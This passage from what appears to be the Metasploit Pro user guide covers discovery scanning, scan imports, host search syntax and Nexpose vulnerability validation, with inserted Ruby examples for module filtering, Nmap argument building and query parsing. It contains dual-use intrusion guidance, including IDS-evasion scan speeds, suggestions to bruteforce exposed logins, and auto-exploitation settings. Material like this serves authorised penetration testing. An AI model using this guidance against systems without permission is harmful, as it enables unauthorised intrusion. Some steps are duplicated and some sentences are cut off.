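      [tag.downcase, value.downcase]
    else
      ['text', token.downcase]
    end
  end
end

# Every term must match (terms are ANDed, as a narrowing search would expect).
def module_matches?(mod, terms)
  terms.all? do |tag, value|
    case tag
    when 'text' then mod[:name].downcase.include?(value) || mod[:path].downcase.include?(value)
    when 'cve'  then mod[:cves].any? { |c| c.downcase.include?(value) }   # cve:2008-4250
    else mod[tag.to_sym].to_s.downcase.include?(value)
    end
  end
end

# Returns matching module paths, best ranking first; min_rank drops anything
# ranked below it (e.g. min_rank: 'normal' hides low and average exploits).
def search_modules(catalog, query, min_rank: nil)
  terms = parse_module_query(query)
  floor = min_rank ? RANKS.index(min_rank.downcase) : 0
  raise ArgumentError, "unknown ranking: #{min_rank}" if floor.nil?
  catalog.select { |m| module_matches?(m, terms) && RANKS.index(m[:rank]) >= floor }
         .sort_by { |m| -RANKS.index(m[:rank]) }
         .map { |m| m[:path] }
end
```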
Chapter 7: Scanning
About Scanning on page 126
Discovery Scans on page 127
Discovery Scan Tasks on page 135
About Scanning
Before you can begin the exploitation phase of a penetration test, you must add host data to the project. Host data refers to the IP addresses of the systems that you want to exploit and the active ports, services, and vulnerability information associated with those systems. To add host data to a project, you can either run a discovery scan or you can import scan data from a vulnerability scanner, such as Nexpose or Nessus. If you import data from a vulnerability analysis tool, or some other third party vendor, you should still run a discovery scan to identify new or additional information for those hosts. A discovery scan is the port scanner included with Metasploit Pro. It combines Nmap with several modules to identify the systems that are alive and to uncover the open ports and services. A port is a data connection that serves as a gateway for communication and enables traffic to travel between systems. Network services, like SSH, telnet, and HTTP, typically run on standard port numbers and can indicate the purpose of the system. You can use the results to filter the list of attackable targets. For example, if you discover a service that allows remote code execution, like VNC, you can bruteforce the service to attempt to log into the system.
Discovery Scans
One of the first steps in penetration testing is reconnaissance. Reconnaissance is the process of gathering information to obtain a better understanding of a network. It enables you to create a list of target IP addresses and devise a plan of attack. Once you have a list of IP addresses, you can run a discovery scan to learn more about those hosts. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. A discovery scan is the internal Metasploit scanner. It uses Nmap to perform basic TCP port scanning and runs additional scanner modules to gather more information about the target hosts. By default, the discovery scan includes a UDP scan, which sends UDP probes to the most commonly known UDP ports, such as NETBIOS, DHCP, DNS, and SNMP. The discovery scan tests approximately 250 ports that are typically exposed for external services and are more commonly tested during a penetration test. During a discovery scan, Metasploit Pro automatically adds the host data to the project. You can review the host data to obtain a better understanding of the topology of the network and to determine the best way to exploit each target. Oftentimes, the network topology provides insight into the types of applications and devices the target has in place. The more information that you can gather about a target, the more it will help you fine-tune a test for it.
The host status
The operating system
The open ports
The running services
During the second phase, port scanning, Metasploit Pro runs Nmap to identify the ports that are open and the services that are available on those ports. Nmap sends probes to various ports and classifies the responses to determine the current state of the port. The scan covers a wide variety of commonly exposed ports, such as HTTP, telnet, SSH, and FTP. The discovery scan uses the default Nmap settings, but you can add custom Nmap options to customize the Nmap scan. For example, the discovery scan runs a TCP SYN scan by default. If you want to run a TCP Connect scan instead of a TCP SYN scan, you can supply the -sT option. Any options that you specify override the default Nmap settings that the discovery scan uses. After the discovery scan identifies the open ports, the third phase begins. Nmap sends a variety of probes to the open ports and detects the service version numbers and operating system based on how the system responds to the probes. The operating system and version numbers provide valuable information about the system and help you identify a possible vulnerability and eliminate false positives. Finally, after Nmap collects all the data and creates a report, Metasploit Pro imports the data into the project. Metasploit Pro uses the service information to run additional modules that target the discovered services and to probe the target for more data. For example, if the discovery scan sweeps a target with telnet probes, the target system may return a login prompt. A login prompt can indicate that the service allows remote access to the system, so at this point, you may want to run a bruteforce attack to crack the credentials.
Standard and well known ports, such as ports 20, 21, 22, 23, 25, 53, 80, and 443.
Alternative ports for a service, such as ports 8080 and 8442, which are additional ports that HTTP and web services can use.
Ports listed as the default port in a module.
In total, the discovery scan includes over 250 ports. If you do not see the port that you want to scan, you can manually add the port to the discovery scan. For example, if you know that your company runs web servers with port 9998 open, you need to manually add port 9998 to the discovery scan. This ensures that the discovery scan includes every port that is potentially open. If you want to scan all ports, you can specify 1-65535 as the port range. Keep in mind that a discovery scan that includes all ports can take several hours to complete. If there is a port that you do not want to scan, you can exclude the port from the discovery scan. The discovery scan will not scan any ports on the excluded list. For example, if your company uses an application that runs on port 1234, and you do not want to affect the application's performance, you can add the port to the excluded list.
Metasploit PWDump Export
Metasploit Export XML
Metasploit Export ZIP
NeXpose XML or XML 2.0
NeXpose Raw XML or XML Export
Foundstone Network Inventory XML
Microsoft MBSA SecScan XML
nCircle IP360 (XMLv3 and ASPL)
NetSparker XML
Nessus NBE
Nessus XML (v1 and v2)
Qualys Asset XML
Qualys Scan XML
Burp Session XML
Acunetix XML
AppScan XML
Nmap XML
Retina XML
Amap Log
IP Address List
Libpcap Network Capture
Raw XML is only available in commercial editions of Nexpose and includes additional vulnerability information. Note: Metasploit Pro does not import service and port information from Qualys Asset files. If you import a Qualys Asset file, you must run a discovery scan to enumerate services and ports that are active on the imported hosts.
Target addresses
Defines the individual hosts or network range that you want to scan.
Excluded TCP ports
Excludes certain TCP ports from service discovery. By default, the port scan covers a specific range of ports. Use this option to add a port that you want to exclude from the scan.
instead.
Port scan speed
Controls the Nmap timing option. Choose from the following timing templates:
Insane (5) - Speeds up the scan. Assumes that you are on a fast network and sacrifices accuracy for speed. Scan delay is less than 5 ms.
Aggressive (4) - Speeds up the scan. Assumes that you are on a fast and reliable network. Scan delay is less than 10 ms.
Normal (3) - The default port scan speed. Does not affect the scan.
Polite (2) - Uses less bandwidth and target resources to slow the scan.
Sneaky (1) - Use this port scan speed for IDS evasion.
Paranoid (0) - Use this port scan speed for IDS evasion.
Port scan timeout
Determines the amount of time Nmap spends on each host. The default value is 5 minutes.
UDP service discovery
Sets the discovery scan to find all services that are on the network. Metasploit uses custom modules instead of Nmap to perform UDP service discovery.
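The following is an added example, not Metasploit Pro code, showing how the discovery scan settings described above (the port list with manual additions and exclusions, the port scan speed, the port scan timeout, and custom Nmap arguments that take precedence over the defaults) translate into an Nmap argument list. The port sets are short constructed samples rather than the real ~250-port list, and mapping the default scan type to -sS and the port scan timeout to Nmap's --host-timeout are my assumptions.

```ruby
# Build the Nmap argument list implied by the guide's discovery scan settings:
# the port list (standard, alternate and module-default ports, plus manual
# additions, minus exclusions), a timing template from the port scan speed,
# the per-host timeout, and custom arguments that override conflicting defaults.
# Added example, not Metasploit Pro code; the port sets are constructed samples.

STANDARD_PORTS  = [20, 21, 22, 23, 25, 53, 80, 443].freeze   # listed in the guide
ALTERNATE_PORTS = [8080, 8442].freeze                         # listed in the guide
MODULE_PORTS    = [445, 1720].freeze                          # constructed sample of module defaults
PORTSCAN_SPEEDS = { 'paranoid' => 0, 'sneaky' => 1, 'polite' => 2,
                    'normal' => 3, 'aggressive' => 4, 'insane' => 5 }.freeze
# A custom argument replaces the default from the same family (scan type,
# timing, port list, host timeout); anything else is simply appended.
FLAG_FAMILIES = [/\A-s[A-Z]/, /\A-T/, /\A-p/, /\A--host-timeout/].freeze

# "9998" or "1-65535" (or an Integer) -> array of port numbers
def expand_port_entry(entry)
  a, b = entry.to_s.split('-', 2).map { |x| Integer(x, 10) }
  b ||= a
  unless a <= b && (1..65535).cover?(a) && (1..65535).cover?(b)
    raise ArgumentError, "bad port entry: #{entry}"
  end
  (a..b).to_a
end

def discovery_ports(extra: [], excluded: [])
  base = STANDARD_PORTS + ALTERNATE_PORTS + MODULE_PORTS
  wanted = (base + extra.flat_map { |e| expand_port_entry(e) }).uniq.sort
  wanted - excluded.flat_map { |e| expand_port_entry(e) }
end

# Compress a port list into Nmap -p syntax, e.g. [20, 21, 22, 23, 25] -> "20-23,25".
def port_spec(ports)
  ranges = []
  ports.uniq.sort.each do |p|
    if ranges.last && ranges.last[1] == p - 1
      ranges.last[1] = p
    else
      ranges << [p, p]
    end
  end
  ranges.map { |a, b| a == b ? a.to_s : "#{a}-#{b}" }.join(',')
end

def flag_family(arg)
  FLAG_FAMILIES.find { |re| re.match?(arg) } || arg
end

def nmap_args(targets:, ports:, speed: 'normal', timeout_min: 5, custom: [])
  level = PORTSCAN_SPEEDS.fetch(speed.downcase) { raise ArgumentError, "unknown port scan speed: #{speed}" }
  defaults = [['-sS'], ["-T#{level}"], ['--host-timeout', "#{timeout_min}m"], ['-p', port_spec(ports)]]
  kept = defaults.reject { |grp| custom.any? { |c| flag_family(c) == flag_family(grp[0]) } }
  kept.flatten + custom + targets
end

if __FILE__ == $PROGRAM_NAME
  ports = discovery_ports(extra: [9998], excluded: [1234])   # values from the guide's examples
  puts nmap_args(targets: ['192.168.184.0/24'], ports: ports, speed: 'polite', custom: ['-sT']).join(' ')
end
```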
SMB password
Defines the SMB password that the discovery scan uses to attempt to log in to SMB services.
SMB domain
Defines the SMB server name and share name.
IPv6 Addresses
Metasploit Pro does not automatically detect IPv6 addresses during a discovery scan. For hosts with IPv6 addresses, you must know the individual IP addresses that are in use by the target devices and specify those addresses to Metasploit Pro. To identify individual IPv6 addresses, you can use SNMP, Nmap, or thc-alive6, which is part of the thc-ipv6 toolkit. After you identify the IPv6 addresses for the target devices, you can either import a text file that contains the host addresses into a project or manually add the hosts to a project. If you choose to import the addresses, the text file that you use must list each IPv6 address on a new line. To import a host address file, select Analysis > Hosts > Import. When the Import Data window appears, browse to the location of the host address file and import the host address file. To manually add a host, select Analysis > Hosts > New Host.
VMware ESXi 3.5, 4.0, 4.1, and 5.0
VMware ESX 1.5, 2.5, 3.0, and 4.0
vCenter
Running a Discovery Scan
Viewing the Results from a Discovery Scan
Importing Scan Data
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
4. At this point, you can launch the scan. However, if you want to fine-tune the scan, you can click the Show Advanced Options button to display additional options that you can set for the discovery scan. For example, you can specify the IP addresses that you want to explicitly include and exclude from the scan.
5. When you are ready to run the scan, click the Launch Scan button.
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
4. Click the Show Advanced Options button.
5. In the Custom TCP source port field, enter 1720.
7. Select the Scan H.323 video endpoints option. By default, this option is enabled.
8. Click the Launch Scan button.
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
4. Click the Show Advanced Options button.
5. Under the Advanced Target Settings, find the Custom Nmap arguments field.
6. In the Custom Nmap arguments field, enter the Nmap arguments you want to use.
Note: Any command line arguments that you specify take precedence over the default configuration that Metasploit Pro uses for the discovery scan.
7. Optionally, you can define any advanced options that are available. For example, you can specify the IP addresses that you want to include and exclude from the scan, as well as the target ports, services, scan speed, and scan mode for the discovery scan.
8. When you are ready to run the scan, click the Launch Scan button.
Host Management
A host refers to a target machine that you scanned, imported, or manually added to a project. At a minimum, each host has an IP address, a list of active services, and system information. You can manually add a host to a project if you do not have import data for it or if the discovery scan cannot communicate with it. You can configure the details for the host, which includes the network, operating system, and service information. Additional information you can define includes vulnerability information, host comments, and host tags.
Advanced Search
When you perform a basic search, Metasploit searches all columns in the hosts table. Oftentimes, the search may not be specific enough and returns records that are false positives. For example, if you perform a basic search for Windows, the results may include all hosts that have Windows somewhere in the description, and not only hosts that are Windows machines. To work around false positives, you can perform an advanced search. In an advanced search, you specify exactly where in the hosts table you want the search to look. This is particularly useful when you want to narrow the results to a specific subset of data.
Search Filter - Refers to the column in the table where you want the search to look.
Search Operator - Refers to the operators that you can add to narrow or broaden a search query. A search operator is also known as a connector.
Keyword - Refers to a single word or phrase that the search uses to find matching records.
To create an advanced search query, you need to first specify the search filter, followed by the search operator and keyword. Going back to the previous example, if you want to only see hosts that are Windows specific machines, you would use the following search query: os:windows. This query ensures that the search only looks in the OS column of the hosts tables for the Windows keyword and only returns hosts that have been fingerprinted as Windows systems.
Search Operators
Metasploit Pro provides several different types of search operators that you can use to refine your host search. The search operator that you need to use depends on the type of data that you want the search to find.
Text Operators
You should use text operators when you want to perform a full-text search. Typically, you use text operators when you search for any data other than ports or IP addresses.
Like Operator (:) - Add the LIKE operator to a search query to include all records that have the keyword in the specified column. For example, if you search for os:windows, the search shows any hosts with the keyword, Windows, in the OS field.
Not Like Operator (!:) - Add the NOT LIKE operator to a search query to exclude records that have the keyword in the specified column. For example, if you search for os!:windows, the search does not return any records that contain the keyword, Windows, in the OS field.
Equals Operator (=) - Add the EQUALS operator to a search query to return an exact match. For example, if you search for os=Windows, the search shows all hosts that match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will not appear in the results because they do not match the query exactly.
Not Equals Operator (<>) - Add the NOT EQUALS operator to exclude records that contain the keyword. For example, if you search for os<>Windows, the search excludes hosts that exactly match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will appear in the results because they do not match the query.
And Operator (&&) - Add the AND operator to a query to combine multiple keywords or search criteria. The AND operator requires that all the keywords or search criteria appear in the results. For example, if you search for os:windows && sp0, the search returns the hosts that match both criteria.
Or Operator (||) - Add the OR operator to a search query to include any of your search terms in the resulting records. You can use the OR operator to broaden your search. For example, if you search for os:Windows || ip:192.168, the search finds hosts that are running Windows or have an IP address that starts with 192.168. The hosts do not have to match both search criteria.
Numeric Operators
You should use numeric operators when you search for integer values or when you want to compare numeric values. Typically, you use numeric operators when you search for IP addresses or ports.
Equal Operator (= or :) - Add the equal operator to perform a mathematical equivalency check. For example, if you search for port:445, the search shows all services that
Not Equal Operator (<> or !:) - Add the not equal operator to perform a mathematical non-equivalency check. For example, if you search for port!:445, the search returns all services except those that are open on port 445.
Comparison Operator (<, <=, >, or >=) - Add a comparison operator to compare two values. For example, if you search for vulns>0, the search only shows hosts that have vulnerabilities.
Tag Operators
You should use tag operators when you search for host tags.
Hash Sign (#) - Append the hash sign to any host tag to search for hosts. For example, if you search for #windows, the search shows any hosts that have the windows host tag.
Search Filters
In Metasploit, a search filter refers to a column of data in the hosts table. You specify a search filter to specify where you want the search to look in the hosts table. For example, if you want to search for hosts based on the operating system, you should use the os search filter. The search filters that are available depend on the page that you are currently viewing in the Analysis area. When you perform a search, you can only use the search filters that are available for that specific page. Some search filters are global, such as hostname and OS; however, there are some that are specific to the page that you are viewing, such as proto or ref. There are five different pages that you can view from the Analysis area and each has its own set of search filters:
Read the following sections to learn more about the search filters that each page supports.
Hosts Page
The Hosts page enumerates all hosts that have been fingerprinted. To access the Hosts page, select Analysis > Hosts from the Tasks bar. The Hosts page supports the following search filters:
Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
OS - Refers to the operating system that runs on the host.
Version - Refers to the version of the operating system that the host runs, such as Windows 2000.
Purpose - Identifies whether the host is a client, server, or device.
IP - Refers to the IP address of a host.
Vulns - Identifies the number of vulnerabilities that have been identified for a host.
Services - Identifies the number of services that have been found for a host.
Notes Page
The Notes page shows any additional information that Metasploit was able to obtain from the hosts. Notes are bits of information that Metasploit is able to obtain from a host, but are not easily sorted into existing table columns. To access the Notes page, select Analysis > Notes from the Tasks bar. The Notes page supports the following search filters:
Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Type - Identifies the method or source used to obtain the note, such as from an import or fingerprint.
IP - Refers to the IP address of a host.
Data - Refers to the information stored in the note.
Services Page
The Services page shows all services that Metasploit was able to enumerate for open ports. To access the Services page, select Analysis > Services from the Tasks bar. The Services page supports the following search filters:
Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Refers to the services that are active on the port, such as DCERPC, HTTP, and SSH.
Proto - Refers to the protocol that the port runs, such as TCP or UDP.
OS - Identifies the operating system and version that the host runs.
IP - Refers to the IP address of a host.
Vulnerabilities Page
The Vulnerabilities page shows all vulnerabilities that Metasploit was able to identify for the hosts in a project. To access the Vulnerabilities page, select Analysis > Vulnerabilities from the Tasks bar. The Vulnerabilities page supports the following search filters:
Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Info - Refers to the description of the vulnerability.
Ref - Refers to the vulnerability reference ID.
IP - Refers to the IP address of a host.
Name - Refers to the name of the vulnerability.
Refers to the host name, or nickname, that uniquely identifies the machine.
Refers to the description of the vulnerability.
Refers to the IP address of a host.
Refers to the captured data type, such as a shadow file, private or public key, or a process list.
Refers to the name of the vulnerability.
Nested Searches
Nesting is an advanced search strategy that enables you to build a more complex and precise search query. When you create a nested search query, you use parentheses to group search terms together with search operators and define the order in which they are processed. Each set of keywords that are enclosed in parentheses is processed as a single unit. Since Boolean logic operates on mathematical principles, the search expressions defined within parentheses take precedence over those that are not. If there is more than one set of parentheses, the innermost set of parentheses is processed first, then the next, and so on until the entire query has been interpreted. The search engine supports infinite levels of nesting. Note: The AND operator takes precedence over the OR operator when the search query is parsed.
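As an added example that is not part of the guide, the evaluator below implements the advanced search syntax described in the Advanced Search section and above: filter:value terms with the text, numeric and tag operators, the && and || connectors, and nested parentheses, with AND binding tighter than OR. It runs against a constructed in-memory hosts table; treating ip: as a prefix match, exact matches as case-insensitive, and the column names as hash keys are my assumptions, as are the class and function names.

```ruby
# Evaluate Metasploit Pro style advanced host searches against an in-memory
# hosts table: filter:value terms with the guide's text, numeric and tag
# operators, && and || connectors, and nested parentheses (AND binds tighter
# than OR). Added example, not Metasploit Pro code; SAMPLE_HOSTS is constructed.

TOKEN_RE = /\(|\)|&&|\|\||#[^\s()]+|\w+(?:!:|<>|<=|>=|[<>=:])[^\s()]+|[^\s()]+/
NUMERIC_FILTERS = %w[vulns services].freeze                  # compared as integers
TEXT_COLUMNS    = %i[hostname os version purpose ip].freeze  # bare keywords search these
NUM_OPS = { ':' => :==, '=' => :==, '!:' => :!=, '<>' => :!=, '<' => :<, '<=' => :<=, '>' => :>, '>=' => :>= }.freeze

SAMPLE_HOSTS = [
  { hostname: 'dc01', os: 'Microsoft Windows', version: 'Server 2008', purpose: 'server',
    ip: '192.168.1.10', vulns: 3, services: 5, tags: %w[windows critical] },
  { hostname: 'ws07', os: 'Windows', version: 'XP SP0', purpose: 'client',
    ip: '192.168.1.57', vulns: 1, services: 2, tags: %w[windows] },
  { hostname: 'web01', os: 'Linux', version: '2.6', purpose: 'server',
    ip: '10.0.0.5', vulns: 0, services: 3, tags: %w[linux dmz] }
].freeze

class HostQuery
  def initialize(query)
    @tokens = query.scan(TOKEN_RE)
    @pos = 0
    @ast = parse_or
    raise ArgumentError, "unexpected token: #{peek}" if peek
  end

  def matches?(host); eval_node(@ast, host); end
  def peek; @tokens[@pos]; end
  def advance; @pos += 1; @tokens[@pos - 1]; end

  # or_expr := and_expr ('||' and_expr)*   (lowest precedence)
  def parse_or
    node = parse_and
    while peek == '||'
      advance
      node = [:or, node, parse_and]
    end
    node
  end

  # and_expr := term ('&&' term)*   (AND binds tighter than OR, as the guide notes)
  def parse_and
    node = parse_term
    while peek == '&&'
      advance
      node = [:and, node, parse_term]
    end
    node
  end

  # term := '(' or_expr ')' | '#tag' | filter op value | bare keyword
  def parse_term
    tok = advance
    raise ArgumentError, 'unexpected end of query' if tok.nil? || tok == ')'
    if tok == '('
      node = parse_or                       # innermost parentheses are evaluated first
      raise ArgumentError, 'missing closing parenthesis' unless advance == ')'
      return node
    end
    return [:tag, tok[1..-1].downcase] if tok.start_with?('#')
    m = tok.match(/\A(\w+)(!:|<>|<=|>=|[<>=:])(.+)\z/)
    m ? [:cmp, m[1].downcase, m[2], m[3]] : [:text, tok.downcase]
  end

  def eval_node(node, host)
    case node[0]
    when :and  then eval_node(node[1], host) && eval_node(node[2], host)
    when :or   then eval_node(node[1], host) || eval_node(node[2], host)
    when :tag  then host[:tags].any? { |t| t.downcase == node[1] }
    when :text then TEXT_COLUMNS.any? { |c| host[c].to_s.downcase.include?(node[1]) }
    when :cmp  then compare(host, node[1], node[2], node[3])
    end
  end

  def compare(host, filter, op, value)
    key = filter.to_sym
    raise ArgumentError, "unknown search filter: #{filter}" unless host.key?(key)
    if NUMERIC_FILTERS.include?(filter)       # integer comparison, as for port or vulns
      return Integer(host[key]).public_send(NUM_OPS.fetch(op), Integer(value, 10))
    end
    a, v = host[key].to_s.downcase, value.downcase
    like = filter == 'ip' ? a.start_with?(v) : a.include?(v)  # ip:192.168 is a prefix match
    case op
    when ':'  then like       # LIKE
    when '!:' then !like      # NOT LIKE
    when '='  then a == v     # EQUALS (exact match; case-insensitive here)
    when '<>' then a != v     # NOT EQUALS
    else raise ArgumentError, "#{op} is a numeric operator; #{filter} is a text column"
    end
  end
end

def search_hosts(hosts, query)
  q = HostQuery.new(query)
  hosts.select { |h| q.matches?(h) }.map { |h| h[:hostname] }
end
```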
2. When the Hosts window appears, click the New Host button.
3. Under the Name & Address area, enter a name for the host in the Name field and enter an IP address for the host in the IP address field.
4. If you have an Ethernet address for the host, enter it in the Ethernet address field.
5. Under the Operating System area, you can add the operating system information for the host. For example, if you want to add the operating system for the host, you can enter an OS like Windows XP in the OS Name field. This step is completely optional and is only recommended if you have the OS information for the host.
6. Select the Lock edited host attributes option if you do not want subsequent imports, discovery scans, or Nexpose scans to modify the host information. By default, this option is enabled.
7. If you want to add a service to the host, click the Add Service link. You will need to define the name, port, protocol, and state for the service.
Deleting a Host
1. From within a project, click the Analysis tab.
2. When the Hosts window appears, select the hosts that you want to delete.
Viewing Vulnerabilities
From within a project, select Analysis > Vulnerabilities from the Tasks menu.
Viewing Tags
From within a project, click the Tags tab on the Tasks menu.
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
4. When the File Upload window appears, browse to the location of the file you want to import. Most import files will either be an XML or ZIP file. When you find the file that you want to upload, select it and click the Open button.
5. If you do not want to import the information for a specific host, you can enter the IP address for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address.
6. If you do not want the import to overwrite data for an existing host, you must select the Do not change existing hosts option.
7. Click the Import Data button.
Getting Started with Vulnerability Validation on page 153
Validating Nexpose Vulnerabilities with the Vulnerability Validation Wizard on page 157
Tracking Real-Time Statistics and Events for Vulnerability Validation on page 180
Nexpose Exceptions on page 187
Validated Vulnerabilities on page 193
Vulnerability Validation Wizard - This method is the easiest and should be used for bulk validations. It provides an all-in-one interface that walks you through importing and exploiting Nexpose vulnerabilities. It also helps you easily identify the vulnerabilities that are exploitable and non-exploitable so that you can send that data back to Nexpose.
Manual Validation - This method requires much more legwork and should be used when you have specific vulnerabilities that you want to target. When you perform manual validation, you will need to set up a penetration test as you normally would. This includes creating a project, importing/scanning Nexpose sites, and exploiting specific vulnerabilities. After Metasploit Pro identifies the vulnerabilities that are exploitable and non-exploitable, you will be able to push that data back to Nexpose.
Creating a project.
Scanning or importing Nexpose sites.
Tagging Nexpose assets (optional).
Asset Groups
The Nexpose term for a group of hosts or targets.
Nexpose Push
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.
Site
The Nexpose term for a collection of assets.
Validated Vulnerability
A vulnerability found by Nexpose that Metasploit Pro was able to successfully exploit and obtain a session.
Vulnerability
A security flaw or weakness in an application or system that enables an attacker to compromise the target system.
Vulnerability Exception
A vulnerability found by Nexpose that Metasploit Pro was unable to exploit.
Vulnerability Validation
The process of identifying vulnerabilities that are exploitable.
Before You Begin
Before you can run the Vulnerability Validation Wizard, you will need to make sure that you have access to a Nexpose instance. You can only validate vulnerabilities with Metasploit Pro if you have Nexpose Enterprise or Nexpose Consultant version 5.7.16 or higher. Please check your Nexpose edition before attempting to use the Vulnerability Validation Wizard.
4. When the Configure a Nexpose Console page appears, enter the following information:
Console Address - The IP address of the server that runs Nexpose. You can also specify the server name.
Console Port - The port that runs the Nexpose service. The default port is 3780.
Console Username - The Nexpose user name that will be used to log in to the console.
Console Password - The Nexpose password that will be used to authenticate the user account.
Importing Existing Sites - You can choose multiple sites from which you want to import hosts. Metasploit Pro pulls all of the hosts and their associated vulnerability information from the selected sites and stores their information in a project. Metasploit Pro only imports vulnerabilities for which it has matching exploit modules. For more information on how to import and exploit vulnerabilities with the Vulnerability Validation Wizard, see Importing and Exploiting Imported Nexpose Data on page 157.
Running a Nexpose Scan - You can specify the hosts that you want to scan for vulnerabilities. Metasploit Pro creates a new site on Nexpose and adds the hosts to it. Nexpose scans the hosts for vulnerabilities. After the Nexpose scan completes, Metasploit Pro imports the vulnerabilities for which it has matching exploit modules. For more information on how to scan for vulnerabilities and exploit them with the Vulnerability Validation Wizard, see Scanning Nexpose Sites and Exploiting Identified Vulnerabilities on page 168.
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
5. Verify that the Import existing Nexpose vulnerability data option is selected.
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console from which you want to import sites. After you select a console, the wizard displays the list of sites that you can import.
Note: Metasploit Pro will import all the assets from a site unless you explicitly define the assets that you want to exclude. To exclude assets from the import, click the Excluded Addresses dropdown and enter the addresses of those assets in the Excluded Addresses field.
7. From the sites list, select the sites that you want to import into the project. You can use the select all checkbox to choose all of the listed sites, or you can select the sites individually.
Note: Metasploit Pro imports all assets from the site. For each asset, Metasploit Pro pulls and displays the IP address, operating system, MAC address, OS flavor, vulnerability name, and vulnerability references.
8. After you select the sites you want to import, click on the Tag tab and select the Tag option.
Note: Tags are a useful tool if you want to easily create Nexpose asset groups in Metasploit Pro. If you do not want to tag assets, go to Step 10.
9. Select the Automatically tag by OS option if you want to tag each host with its operating system.
Note: If this option is enabled, Windows hosts will be tagged with os_windows, and Linux hosts will be tagged with os_linux.
10. Select the Use custom tag option if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to define a custom tag.
11. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
12. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should choose Great or Excellent.
13. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the Generate Report option and skip to the last step.
14. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
15. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
16. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report.
17. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
18. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDR notation.
19. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
20. Click the Launch button. The Findings window appears and shows the statistics for the test.
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console that you want to use to scan for vulnerabilities. The scan configuration page appears.
7. Enter the host addresses, or assets, that you want to scan in the Scan targets field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDR notation.
8. Click the Scan template dropdown and select the template you want to use.
Note: A scan template is a predefined set of scan options. There are a few default ones that you can choose from. For more information on each scan template, please see the Nexpose User's Guide.
9. Click the Tag tab.
Note: If you do not want to tag assets, go to Step 13.
10. Select the Automatically tag by OS option if you want to tag each host with its operating system.
11. Select the Use custom tag option if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to create a custom tag.
12. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
13. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should use Great or Excellent.
14. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the Generate Report option and skip to the last step.
15. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
16. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
17. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report.
18. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
19. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDR notation.
20. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
21. Click the Launch button. The Findings window appears and shows the statistics for the test.
3. Click the Vulnerability Validation task name. The Findings window appears.
From the Statistics tab, you can track the following data:
The total number of hosts that have been scanned or imported.
The total number of unique vulnerabilities that have been identified.
The total number of exploit modules that match Nexpose vulnerabilities.
The total number of vulnerabilities that Metasploit Pro was able to exploit.
The total number of vulnerabilities that Metasploit Pro was unable to exploit.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of hosts displayed.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of vulnerabilities displayed.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exploit modules displayed.
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability validations, the state will be exploited.
